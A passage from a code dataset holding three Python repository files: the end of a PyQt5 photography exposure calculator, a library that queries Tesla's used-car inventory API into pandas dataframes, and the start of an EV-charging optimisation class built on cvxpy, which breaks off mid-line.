utils.main import ReferenceNumbers\nfrom utils.data import ref\n# Code Handler Imports\n\n# PyQt5 (UI Framework) Imports\nfrom PyQt5 import QtWidgets, uic, QtGui\n\n\nclass ProgramUi(QtWidgets.QMainWindow):\n def __init__(self):\n '''View Initialisation'''\n super(ProgramUi, self).__init__()\n uic.loadUi('app/basic.ui', self)\n self.setWindowTitle('Photography Program')\n # Initalises the window from the .ui file\n self.OPTIONS = [\"Lighting Condition\", \"ISO\", \"Shutter Speed\", \"Aperture\"]\n \n self.setting_type = self.findChild(QtWidgets.QComboBox, 'setting1_Combo')\n self.setting_type.addItems(self.OPTIONS)\n self.setting_type.currentTextChanged.connect(self.update_combo)\n\n self.settings1_label = self.findChild(QtWidgets.QLabel, 'value1_Label')\n self.settings2_label = self.findChild(QtWidgets.QLabel, 'value2_Label')\n self.settings3_label = self.findChild(QtWidgets.QLabel, 'value3_Label')\n\n self.setting1_input = self.findChild(QtWidgets.QTextEdit, 'setting1_textEdit')\n self.setting2_input = self.findChild(QtWidgets.QTextEdit, 'setting2_textEdit')\n self.setting3_input = self.findChild(QtWidgets.QTextEdit, 'setting3_textEdit')\n self.setting1_input.textChanged.connect(self.update)\n self.setting2_input.textChanged.connect(self.update)\n self.setting3_input.textChanged.connect(self.update)\n\n self.CURRENT_LABELS = list(self.OPTIONS)\n self.CURRENT_LABELS.remove(self.setting_type.currentText())\n # Creates All the Inputs & Settings\n\n self.ReferenceHandler = ReferenceNumbers()\n # Creates the reference handler\n\n self.result_lighting = self.findChild(QtWidgets.QLabel, 'answer_lighting')\n self.result_iso = self.findChild(QtWidgets.QLabel, 'answer_iso')\n self.result_shutter = self.findChild(QtWidgets.QLabel, 'answer_shutter')\n self.result_aperture = self.findChild(QtWidgets.QLabel, 'answer_aperture')\n\n\n self.show()\n \n def update_combo(self):\n tempDict = {}\n\n tempDict[self.CURRENT_LABELS[0]] = self.setting1_input.toPlainText()\n tempDict[self.CURRENT_LABELS[1]] = self.setting2_input.toPlainText()\n tempDict[self.CURRENT_LABELS[2]] = self.setting3_input.toPlainText()\n \n \n self.CURRENT_LABELS = list(self.OPTIONS)\n self.CURRENT_LABELS.remove(self.setting_type.currentText())\n self.settings1_label.setText(\"{}\".format(self.CURRENT_LABELS[0]))\n self.settings2_label.setText(\"{}\".format(self.CURRENT_LABELS[1]))\n self.settings3_label.setText(\"{}\".format(self.CURRENT_LABELS[2]))\n\n if self.settings1_label.text() in tempDict:\n self.setting1_input.setText(tempDict[self.settings1_label.text()])\n else:\n self.setting1_input.setText(\"\")\n \n if self.settings2_label.text() in tempDict:\n self.setting2_input.setText(tempDict[self.settings2_label.text()])\n else:\n self.setting2_input.setText(\"\")\n \n if self.settings3_label.text() in tempDict:\n self.setting3_input.setText(tempDict[self.settings3_label.text()])\n else:\n self.setting3_input.setText(\"\")\n \n def update(self):\n tdict = {}\n\n tdict[self.CURRENT_LABELS[0]] = self.setting1_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n tdict[self.CURRENT_LABELS[1]] = self.setting2_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n tdict[self.CURRENT_LABELS[2]] = self.setting3_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n if self.ReferenceHandler.isValid(tdict[self.CURRENT_LABELS[0]], self.CURRENT_LABELS[0]) and self.ReferenceHandler.isValid(tdict[self.CURRENT_LABELS[1]], self.CURRENT_LABELS[1]) and self.ReferenceHandler.isValid(tdict[self.CURRENT_LABELS[2]], self.CURRENT_LABELS[2]):\n ReferenceValues = self.ReferenceHandler.getAllReferenceValues(tdict)\n CurrentAverage = sum(ReferenceValues.values())\n RequiredAverage = 16\n\n SelectedValue = RequiredAverage-CurrentAverage\n\n selected = self.setting_type.currentText()\n selected = selected.replace(\" Speed\", \"\")\n selected = selected.replace(\" Condition\", \"\")\n \n if SelectedValue > 0 and SelectedValue <= 8:\n print(f\"Required {self.setting_type.currentText()} Value: {ref[str(SelectedValue)][selected]}\")\n tdict[self.setting_type.currentText()] = ref[str(SelectedValue)][selected]\n for item in tdict:\n item_type = item.replace(\" Speed\", \"\").replace(\" Condition\", \"\")\n \n if self.ReferenceHandler.isValid(tdict[item], item_type):\n if item == \"ISO\":\n self.result_iso.setText(f\"{item}: {tdict[item]}\")\n elif item == \"Aperture\":\n self.result_aperture.setText(f\"{item}: f/{tdict[item]}\")\n elif item_type == \"Shutter\":\n self.result_shutter.setText(f\"{item}: {tdict[item]}s\")\n elif item == \"Lighting Condition\":\n self.result_lighting.setText(f\"Lighting Condition: {tdict[item]}\")\n else:\n if item == \"ISO\":\n self.result_iso.setText(f\"{item}: None\")\n elif item == \"Aperture\":\n self.result_aperture.setText(f\"{item}: None\")\n elif item_type == \"Shutter\":\n self.result_shutter.setText(f\"{item}: None\")\n elif item_type == \"Lighting\":\n self.result_lighting.setText(f\"Lighting Condition: None\")\n return\n elif SelectedValue < 0:\n self.show_error(f\"Too Bright\", f\"Change of {(SelectedValue - 1)*(-1)} stops is required\")\n print(f\"Too Bright - Change of {(SelectedValue - 1)*(-1)} stops is required\")\n elif SelectedValue > 8:\n self.show_error(f\"Too Dark\", f\"Change of {SelectedValue - 8} stops is required\")\n print(f\"Too Dark - Change of {SelectedValue - 8} stops is required\")\n elif SelectedValue == 0:\n self.show_error(f\"Error\", f\"You need to change you settings by 1 stop\")\n print(f\"You need to change you settings by 1 stop\")\n\n\n else:\n tdict = {}\n\n tdict[self.CURRENT_LABELS[0]] = self.setting1_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n tdict[self.CURRENT_LABELS[1]] = self.setting2_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n tdict[self.CURRENT_LABELS[2]] = self.setting3_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n for item in tdict:\n item_type = item.replace(\" Speed\", \"\").replace(\" Condition\", \"\")\n \n if self.ReferenceHandler.isValid(tdict[item], item_type):\n if item == \"ISO\":\n self.result_iso.setText(f\"{item}: {tdict[item]}\")\n elif item == \"Aperture\":\n self.result_aperture.setText(f\"{item}: f/{tdict[item]}\")\n elif item_type == \"Shutter\":\n self.result_shutter.setText(f\"{item}: {tdict[item]}s\")\n elif item == \"Lighting Condition\":\n self.result_lighting.setText(f\"Lighting Condition: {tdict[item]}\")\n else:\n if item == \"ISO\":\n self.result_iso.setText(f\"{item}: None\")\n elif item == \"Aperture\":\n self.result_aperture.setText(f\"{item}: None\")\n elif item_type == \"Shutter\":\n self.result_shutter.setText(f\"{item}: None\")\n elif item_type == \"Lighting\":\n self.result_lighting.setText(f\"Lighting Condition: None\")\n\n def show_error(self, title, message):\n msg = QtWidgets.QMessageBox()\n msg.setWindowTitle(title)\n msg.setText(message)\n msg.setIcon(QtWidgets.QMessageBox.Critical)\n msg.setStandardButtons(QtWidgets.QMessageBox.Ok)\n\n x = msg.exec_()\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = ProgramUi()\napp.exec_()","repo_name":"WidjEt24/YR8_INV1","sub_path":"python/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26781129575","text":"# teslahunter - a library for querying the Tesla Used inventory API\n\nimport enum, json, requests, urllib, time, pickle\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom typing import List, Tuple, Union\nfrom datetime import date\nfrom os import path\n\n\nINVENTORY_API = \"https://www.tesla.com/inventory/api/v1/inventory-results?query=\"\n\n\nclass Model(enum.Enum):\n M3 = \"Model 3\"\n MS = \"Model S\"\n MX = \"Model X\"\n MY = \"Model Y\"\n UNKNOWN = \"Unknown Model\"\n\n\nclass ExteriorColor(enum.Enum):\n RED = \"Red Multi-Coat\"\n WHITE = \"Pearl White Multi-Coat\"\n SILVER = \"Silver Metallic\"\n BLUE = \"Deep Blue Metallic\"\n BLACK = \"Solid Black\"\n GRAY = \"Midnight Silver Metallic\"\n GREY = \"Model X Grey\"\n BROWN = \"Brown Metallic\"\n UNKNOWN = \"Unknown Exterior Color\"\n\n\nclass InteriorColor(enum.Enum):\n PREMIUM_BLACK = \"Premium Black\"\n PREMIUM_WHITE = \"Premium Black and White\"\n TAN = \"Tan\"\n CREAM = \"Cream Premium\"\n WHITE = \"White\"\n BLACK = \"Black\"\n GREY = \"Grey\"\n BLACK_TEXTILE = \"Black Cloth\"\n UNKNOWN = \"Unknown Interior Color\"\n\n\nclass Drivetrain(enum.Enum):\n # M3\n LRAWD = \"Long Range AWD\"\n LRAWDP = \"Long Range AWD Performance\"\n LRRWD = \"Long Range RWD\"\n MRRWD = \"Medium Range RWD\"\n SRAWD = \"Standard Range AWD\"\n SRPRWD = \"Standard Range Plus RWD\"\n # MS/MX\n _60 = \"60Kwh\"\n _70 = \"70Kwh\"\n _75 = \"75Kwh\"\n _85 = \"85Kwh\"\n _70D = \"Dual Motor 70Kwh\"\n _75D = \"Dual Motor 75Kwh\"\n _85D = \"Dual Motor 85Kwh\"\n _90D = \"Dual Motor 90Kwh\"\n _100DE = \"Dual Motor 100Kwh\"\n P85 = \"85Kwh Performance\"\n P85D = \"Dual Motor 85Kwh Performance\"\n P85DL = \"Dual Motor 85Kwh Ludicrous\"\n P90D = \"Dual Motor 90Kwh Performance\"\n P90DL = \"Dual Motor 90Kwh Ludicrous\"\n P100D = \"Dual Motor 100Kwh Performance\"\n P100DL = \"Dual Motor 100Kwh Ludicrous\"\n LRPLUS = \"Long Range Plus AWD\"\n UNKNOWN = \"Unknown Drivetrain\"\n\n\nclass Wheels(enum.Enum):\n EIGHTEEN = '18\" Aero Wheels'\n NINETEEN = '19\" Sport Wheels'\n TWENTY = '20\" Fragile Wheels'\n TWENTY_ONE = '21\" Wheels'\n TWENTY_TWO = '22\" Wheels'\n UNKNOWN = \"Unknown Wheel Type\"\n\n\n# Return descriptions for UX\n\n\ndef get_descriptions(t: enum.Enum):\n return [v.value for v in t]\n\n\n# Lookup an Enum value based on the description\n\n\ndef get_value(t: enum.Enum, description: str):\n for e in t:\n if e.value == description:\n return e\n # Also print out the unknown description\n print(f\"Unknown {description} while looking up {t}\")\n return t.UNKNOWN # this is by convention\n\n\n# Lookup an Enum value based on the code in results\n\n\ndef lookup_code(t: enum.Enum, code: str):\n # If code starts with a number, prefix code with an _\n if code[0].isdigit():\n code = \"_\" + code\n\n for e in t:\n if e.name == code:\n return e\n # Also print out the unknown description\n print(f\"Unknown {code} while looking up {t}\")\n return t.UNKNOWN # this is by convention\n\n\nclass Car:\n VIN: str\n ExteriorColor: ExteriorColor\n InteriorColor: InteriorColor\n Wheels: str\n Mileage: int\n Drivetrain: Drivetrain\n AccelerationBoost: bool\n OriginalDeliveryDate: str # todo: datetime\n History: str\n PhotoUris: List[str]\n Price: int\n PriceHistory: List[int]\n ModelYear: int\n Location: str\n Price: int\n VehicleHistory: str\n Model: Model\n\n def __init__(\n self,\n vin: str,\n exterior_color: ExteriorColor,\n interior_color: InteriorColor,\n drivetrain: Drivetrain,\n wheels: str,\n mileage: int,\n photos: List[str],\n year: int,\n location: str,\n price: int,\n vehicle_history: str,\n model: Model,\n ):\n\n self.VIN = vin\n self.ExteriorColor = exterior_color\n self.InteriorColor = interior_color\n self.Drivetrain = drivetrain\n self.Wheels = wheels\n self.Mileage = mileage\n self.PhotoUris = photos\n self.ModelYear = year\n self.Location = location\n self.Price = price\n self.VehicleHistory = vehicle_history\n self.Model = model\n\n def get_tesla_details_page_uri(self):\n return f\"https://www.tesla.com/used/{self.VIN}\"\n\n\nclass Price:\n Prices: List[Tuple[int, datetime]]\n\n def get_current(self) -> Tuple[int, datetime]:\n if self.Prices.count == 0:\n return None\n else:\n return self.Prices[self.Prices.count - 1]\n\n def add(self, price: int, dt, datetime) -> None:\n self.Prices.append((price, dt))\n\n\n# This is the public entry point\n\n\ndef query(model, drivetrains, exterior_colors, interior_colors, wheels):\n query = create_query(model, drivetrains, exterior_colors, interior_colors, wheels)\n return query_tesla(query, model)\n\n\ndef create_query(model, drivetrains, exterior_colors, interior_colors, wheels):\n def to_str_list(l: List) -> List[str]:\n return [e.name for e in l]\n\n query = {\n \"query\": {\n \"condition\": \"used\",\n \"arrangeby\": \"Price\",\n \"order\": \"asc\",\n \"market\": \"US\",\n \"language\": \"en\",\n \"region\": \"north america\",\n },\n }\n\n query[\"query\"][\"model\"] = model.name.lower()\n\n # programmatically build options based on presence of options (none means no filter)\n\n trim = to_str_list(drivetrains)\n paint = to_str_list(exterior_colors)\n interior = to_str_list(interior_colors)\n whls = to_str_list(wheels)\n\n options = {}\n if len(trim) > 0:\n options[\"TRIM\"] = trim\n if len(paint) > 0:\n options[\"PAINT\"] = paint\n if len(interior) > 0:\n options[\"INTERIOR\"] = interior\n if len(whls) > 0:\n options[\"WHEELS\"] = whls\n query[\"query\"][\"options\"] = options\n\n print(query)\n return query\n\n\ndef get_pictures(car) -> List[str]:\n photos = car[\"VehiclePhotos\"]\n uris = []\n for photo in photos:\n uris.append(photo[\"imageUrl\"])\n return uris\n\n\n# Function to retrieve a page of results from tesla inventory API\n\n\ndef query_tesla(query, model: Model) -> List[Car]:\n cars = []\n offset = 0\n\n def query_page(query, offset):\n query[\"outsideOffset\"] = offset\n query_str = json.dumps(query)\n url_str = urllib.parse.quote(query_str)\n r = requests.get(INVENTORY_API + url_str)\n return r.json()\n\n while True:\n r = query_page(query, offset)\n\n results = r[\"results\"]\n for result in results:\n vin = result[\"VIN\"]\n price = result[\"Price\"]\n location = result.get(\"MetroName\", None)\n mileage = result[\"Odometer\"]\n year = result[\"Year\"]\n vehicle_history = result[\"VehicleHistory\"]\n car = Car(\n vin,\n lookup_code(ExteriorColor, result[\"PAINT\"][0]),\n lookup_code(InteriorColor, result[\"INTERIOR\"][0]),\n lookup_code(Drivetrain, result[\"TRIM\"][0]),\n lookup_code(Wheels, result[\"WHEELS\"][0]),\n mileage,\n get_pictures(result),\n year,\n location,\n price,\n vehicle_history,\n model,\n )\n cars.append(car)\n\n if offset + len(r[\"results\"]) >= int(r[\"total_matches_found\"]):\n break\n\n offset += len(r[\"results\"])\n\n return cars\n\n\n# Function that takes the vector of car objects and converts to a pandas dataframe\n\n\ndef to_dataframe(cars: List[Car]) -> pd.DataFrame:\n df = create_cars_dataframe()\n i = 0\n for car in cars:\n df.loc[i] = [\n car.VIN,\n car.Price,\n car.Model.value,\n car.ModelYear,\n car.Drivetrain.value,\n car.ExteriorColor.value,\n car.InteriorColor.value,\n car.Wheels.value,\n car.Mileage,\n car.Location,\n car.VehicleHistory,\n ]\n i += 1\n return df\n\n\ndef to_enum_list(t, l: List[str]):\n return [get_value(t, i) for i in l]\n\n\n# Daily script that pulls down daily listings for cars\n# Only do this query if there isn't a file with today's date in it already\n\n\ndef get_daily_data() -> pd.DataFrame:\n filename = f\"{date.today()}.pkl\"\n if not path.exists(filename):\n start = time.time()\n msdf = to_dataframe(query(Model.MS, [], [], [], []))\n m3df = to_dataframe(query(Model.M3, [], [], [], []))\n mxdf = to_dataframe(query(Model.MX, [], [], [], []))\n mydf = to_dataframe(query(Model.MY, [], [], [], []))\n end = time.time()\n\n print(f\"Query completed in: {end-start} seconds\")\n\n # Append all the dataframes together\n\n df = msdf.append(m3df)\n df = df.append(mxdf)\n df = df.append(mydf)\n\n df = df.reset_index(drop=True)\n df = df.drop_duplicates()\n df = df.set_index(\"VIN\")\n return df\n else:\n return pd.read_pickle(filename)\n\n\n# Generate synthetic data for n days based on a single day actual dataset\n\n\ndef synthesize_data(\n df, days=10, add_per_day=10, sold_per_day=5, price_adjustment=350\n) -> List[pd.DataFrame]:\n\n # Simulate adding add_per_day new cars per day by removing cars from the 10th day list\n\n dfs = [df]\n current_df = df\n for _ in range(days):\n rows = len(current_df.index)\n new_df = current_df.sample(frac=((rows - add_per_day) / rows))\n new_df[\"Price\"] = new_df[\"Price\"] - price_adjustment\n dfs.insert(0, new_df)\n current_df = new_df\n\n # Simulate selling sold_per_day cars by removing cars cumulatively from each list as sold\n\n sold_list = dfs[0].sample(sold_per_day).index.tolist()\n for i in range(1, len(dfs)):\n dfs[i] = dfs[i].drop(sold_list)\n newly_sold = dfs[i].sample(sold_per_day).index.tolist()\n sold_list += newly_sold\n\n return dfs\n\n\n# Next task is to build a new dataframe based query engine using a pair of dataframes\n# When working on the synthetic data, which is expressed as a List[pd.DataFrame], we\n# will generate two different dataframes. The first is the list of all the cars, along\n# with a new Status column that indicates whether the car is: FOR_SALE, SOLD.\n# There is another table which contains historical lists of prices, and are joined\n# against the cars table.\n\n\nclass Database:\n Cars: pd.DataFrame\n Prices: pd.DataFrame\n\n def __init__(self):\n self.Cars = create_cars_dataframe()\n self.Prices = create_prices_dataframe()\n\n\ndef create_cars_dataframe() -> pd.DataFrame:\n return pd.DataFrame(\n columns=[\n \"VIN\",\n \"Price\",\n \"Model\",\n \"Year\",\n \"Drivetrain\",\n \"Exterior Color\",\n \"Interior Color\",\n \"Wheels\",\n \"Mileage\",\n \"Location\",\n \"History\",\n ]\n )\n\n\ndef create_prices_dataframe() -> pd.DataFrame:\n return pd.DataFrame(columns=[\"VIN\", \"Price\", \"Date\"])\n\n\ndef create_database(data: List[pd.DataFrame]) -> Database:\n filename = \"db.pkl\"\n if not path.exists(filename):\n db = Database()\n df = pd.read_pickle(\"2020-11-25.pkl\")\n dfs = synthesize_data(df)\n for df in dfs:\n # Add records from df that aren't in db.Cars\n # Add prices from df to db.Prices\n pass\n\n pickle.dump(db, open(filename, \"wb\"))\n else:\n db = pickle.load(open(filename, \"rb\"))\n return db\n\n\ndef update_database(db: Database, data: Union[pd.DataFrame, List[pd.DataFrame]]):\n pass\n\n\ndef update_day(db: Database, data: pd.DataFrame):\n pass\n","repo_name":"jflam/tesla-hunter","sub_path":"teslahunter.py","file_name":"teslahunter.py","file_ext":"py","file_size_in_byte":11639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2173840871","text":"import pandas as pd\nimport numpy as np\nimport cvxpy as cvx\nimport boto3\ns3 = boto3.resource('s3')\n\n\nclass LoadModel(object):\n \"\"\"This class implements the charging control for a parking lot of EVs. It takes in input data on the start and end\n times for each session, and uses the uncontrolled load profile for each session to calculate the energy that must\n be delivered. There are numerous options for which control should be implemented, described in methods below such as\n `e19_controlled_load()'.\n \"\"\"\n\n def __init__(self, num_sessions=1, charge_rate=6.6):\n \"\"\"This method initializes many of the input and output variables used.\"\"\"\n\n self.uncontrolled_total_load = np.zeros((1, )) # The aggregate uncontrolled load profile\n self.controlled_total_load = np.zeros((1, ))\n self.num_sessions = num_sessions # The number of sessions / number of cars in the parking lot that day\n self.power = np.zeros((96, num_sessions)) # The uncontrolled load profile for each session\n self.arrival_inds = np.zeros(\n (num_sessions,)) # The arrival time of each session, expressed as an index between 0 and 95\n self.departure_inds = np.zeros((num_sessions,)) # The index of the departure time for each vehicle\n self.energies = np.zeros((num_sessions,)) # The energy delivered in each uncontrolled session\n self.charge_rate = charge_rate # The charge rate allowed. The default is level 2, 6.6 kW\n \n def input_data(self, uncontrolled_load, start_inds, end_inds):\n \"\"\"Here the data about the uncontrolled load is provided and the data is preprocessed.\"\"\"\n \n self.power = np.transpose(uncontrolled_load) # Transpose due to shape in CountyData class\n self.uncontrolled_total_load = np.sum(uncontrolled_load, axis=0) # Aggregate all the cars/sessions\n self.arrival_inds = start_inds\n self.departure_inds = end_inds\n for i in range(self.num_sessions):\n if self.departure_inds[i] >= 96: # If the session ends the next day, find the corresponding time in 0 to 96\n # E.g. if arrival is 80 and departure is 100 (the powerflex data has this), the new departure ind is 4.\n # If arrival is 2 and departure is 100, we want to avoid making the interval from 2 - 4 (only 30min when\n # it really is 1 day), so we set the departure time for the sake of the control as arrival time - 1.\n multiple, self.departure_inds[i] = np.divmod(self.departure_inds[i], 96)\n if self.departure_inds[i] >= self.arrival_inds[i]: # Do not make the session time shorter than it is\n if self.arrival_inds[i] > 0:\n self.departure_inds[i] = self.arrival_inds[i] - 1\n else:\n self.departure_inds[i] = 95\n if self.departure_inds[i] == self.arrival_inds[i]: # Each session should be at least one time step\n self.departure_inds[i] = self.arrival_inds[i] + 1\n\n # Calculate the session length as an input to the energy calculation\n if self.departure_inds[i] > self.arrival_inds[i]:\n session_length = self.departure_inds[i] - self.arrival_inds[i]\n else:\n session_length = 96 - self.arrival_inds[i] + self.departure_inds[i]\n # Energy calculated per session in kWh, 0.25 since each time step is 15min or 0.25 hours.\n self.energies[i] = np.minimum(0.25*np.sum(uncontrolled_load, axis=1)[i], 0.25*self.charge_rate*(session_length))\n\n def sdge_controlled_load(self, method='median', summer=True, percentile=50, verbose=False):\n \"\"\"Implements charging control with the SDG&E TOU rate schedule given in the sdge_values method below. See that\n method for an explanation of the rate schedule.\n \"\"\"\n\n energy_prices = sdge_values(method=method, summer=summer, percentile=percentile)\n\n # schedule is the cvxpy variable for the `power', the rate for each vehicle at each time step in kW.\n schedule = cvx.Variable((96, self.num_sessions))\n # The objective is calculated using the energy price: sum_times (price * kW * 0.25)\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n\n constraints = [schedule >= 0] # No V2G or discharging while plugged in\n for i in range(self.num_sessions):\n # No charging above the max rate:\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n # No charging before arrival\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n # No charging after departure\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n # In the case where the charging session runs over midnight, this is the form of the \"no charging before\n # arrival or after departure\" constraint:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n # Must deliver the right amount of energy to each vehicle (the same as was delivered in the uncontrolled case)\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n # CVXPY setup for solving the problem.\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('The objective result is', result)\n\n # Save the controlled output. sdge_controlled_power has the rate for each vehicle at each time step.\n self.sdge_controlled_power = schedule.value\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n\n def pge_cev_controlled_load(self, subscription_level=None, verbose=False):\n \"\"\"Implements the charging control for the PG&E Commercial EV rate schedule. The subscription rate is\n implemented as a cap. Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n if subscription_level is None:\n # The subscription level should be given because this is a very weak backup constraint:\n subscription_level = np.max(self.uncontrolled_total_load)\n\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw = pge_cev_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n # This does not affect the optimization as it is constant for a given subscription level, but here it is:\n obj += subscription_rate_per50kw * subscription_level/50\n\n constraints = [schedule >= 0]\n constraints += [cvx.sum(schedule, axis=1) <= subscription_level] # Keep charging below subscription level\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('Given subscription level', subscription_level, 'the objective result is', result)\n\n self.pge_cev_controlled_power = schedule.value\n # The optimization may fail in this case if there is not enough flexibility to meet the subscription rate cap\n # constraint. In that case the output is saved as -1's to flag the problem without throwing an error.\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1\n \n def simple_cap_controlled_load(self, cap_level, verbose=False):\n \"\"\"Implements the charging control for a simple control set up with a cap on the total load. The value of the\n cap is set in the cap_level input. Please refer to the first control method, `sdge_controlled_load', for\n comments on the optimization set up and constraints which are common between the two.\n \"\"\"\n schedule = cvx.Variable((96, self.num_sessions))\n obj = 1.0\n \n constraints = [schedule >= 0]\n constraints += [cvx.sum(schedule, axis=1) <= cap_level] # Cap on total charging\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n \n self.simple_cap_controlled_power = schedule.value\n # In case the cap is infeasible for a given case:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1 \n \n def minpeak_controlled_load(self, verbose=False):\n \"\"\"Implements the charging control for a simple peak minimization control. Please refer to the first control\n method, `sdge_controlled_load', for comments on the optimization set up and constraints which are common\n between the two.\n \"\"\"\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.max(cvx.sum(schedule, axis=1)) # Minimize the peak total load reached at any time during the day\n \n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n \n self.minpeak_controlled_power = schedule.value\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1 \n\n def pge_cev_demandcharge_controlled_load(self, subscription_level=None, verbose=False):\n \"\"\"Implements the charging control for the PG&E CEV rate but treating the subscription rate like a demand charge\n rather than a cap. Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw = pge_cev_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n # Demand charge on the full time period, demand charge price based on the subscription level price:\n obj += (subscription_rate_per50kw / 50)*cvx.max(cvx.sum(schedule, axis=1))\n \n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('Given subscription level', subscription_level, 'the objective result is', result)\n\n self.pge_cev_demandcharge_controlled_power = schedule.value\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1\n \n def pge_cev_energyonly_controlled_load(self, subscription_level=None, verbose=False):\n \"\"\"Implements the charging control for the PG&E CEV rate without including the subscription at all, just using\n the TOU rate from that schedule - it is up to date on reflecting peak solar and the duck curve issues.\n Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw = pge_cev_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n # Just the energy prices in the objective function:\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n \n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += 